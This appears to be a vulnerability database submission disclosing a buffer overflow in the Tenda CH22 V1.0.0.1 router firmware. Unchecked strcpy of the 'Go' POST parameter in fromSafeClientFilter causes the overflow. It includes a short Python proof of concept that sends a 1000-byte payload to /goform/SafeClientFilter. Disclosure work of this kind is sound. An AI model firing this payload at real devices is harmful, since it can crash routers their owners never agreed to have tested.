| Title | Tenda CH22 V1.0.0.1 Buffer Overflow |
|---|
| Description | ## Overview
- Firmware download website: https://www.tenda.com.cn/download/2230
## Affected version
CH22 V1.0.0.1
## Vulnerability details
The Tenda CH22 V1.0.0.1 firmware has a buffer overflow vulnerability in the `fromSafeClientFilter` function. The `v1` variable receives the `Go` parameter from a POST request and is later passed to the `strcpy` function. However, since the user can control the input of `Go` , the statement `strcpy(s, v1);` can cause a buffer overflow.
## PoC
import requests
ip = "192.168.1.1"
url = f'http://{ip}/goform/SafeClientFilter'
payload = b'a' * 1000
data = {
'Go': payload,
'menufacturer': 'tenda'
}
requests.post(url, data=data) |
|---|
| Source | ⚠️ https://candle-throne-f75.notion.site/Tenda-CH22-fromSafeClientFilter-382df0aa118580a49482f06aadb87da8 |
|---|
| User | ysnysn0121 (UID 86198) |
|---|
| Submission | 06/17/2026 17:26 (1 month ago) |
|---|
| Moderation | 07/23/2026 16:17 (1 month later) |
|---|
| Status | Duplicate |
|---|
| VulDB entry | 329902 [Tenda CH22 1.0.0.1 /goform/SafeClientFilter fromSafeClientFilter page buffer overflow] |
|---|
| Points | 0 |
|---|